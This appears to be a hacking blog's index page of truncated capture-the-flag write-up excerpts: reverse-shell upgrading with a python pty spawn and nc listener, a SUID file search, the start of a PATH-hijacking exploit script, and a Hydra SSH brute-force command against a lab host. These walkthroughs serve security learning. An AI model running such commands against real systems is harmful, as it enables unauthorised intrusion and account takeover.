Phase 1: Enumeration and Reconnaissance We begin by scanning our target IP address to discover open ports and services. We use a two-step nmap scanning strategy to ensure we don’t miss anything wh...

My Dearest Hacker, Valentine’s Day is fast approaching, and “Romance & Co” are gearing up for their busiest season. Behind the scenes, however, things are going wrong. Security alerts sug...

This Valentine’s Day, an employee at Cupid Corp received a heartfelt e-card from a secret admirer, but romance wasn’t the only thing in the air. Initial findings reveal that multiple attacker-contr...

Steghide steghide extract -sf white_rabbit_1.jpg Detailed Breakdown steghide: A steganography tool used to hide or extract data within various file formats such as JPEG, BMP, WAV, or AU....

From Reverse Shell to full interactive XTERM python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@cybercrafted:/var/www/admin$ ^Z zsh: suspended nc -lvnp 4444 ...

GPG Keys Basic Concepts GPG (GNU Privacy Guard) is a free implementation of OpenPGP that allows you to encrypt and sign data and communications. It uses both public key (asymmetric) and symmetric...

Find find / -perm -4000 2>/dev/null Detailed Breakdown find /: Searches starting from the root directory /. -perm -4000: Looks for files with the SUID (Set User ID) permi...

Path Hijacking Automated script #!/bin/bash # PATH Hijacking Exploit for teaParty echo "=== PATH Hijacking Exploit ===" # Create a temporary directory for our malicious binary mkdir -p /tmp/exp...

Linpeas What is linpeas? linpeas (Linux Privilege Escalation Awesome Script) is an automated post-exploitation reconnaissance tool designed to enumerate potential privilege escalation vectors on ...

Hydra hydra -l julia -P /usr/share/wordlists/rockyou.txt ssh://merchan.thl -t 64 This command uses Hydra, a parallelized login cracker, to perform a brute-force attack against an SSH service run...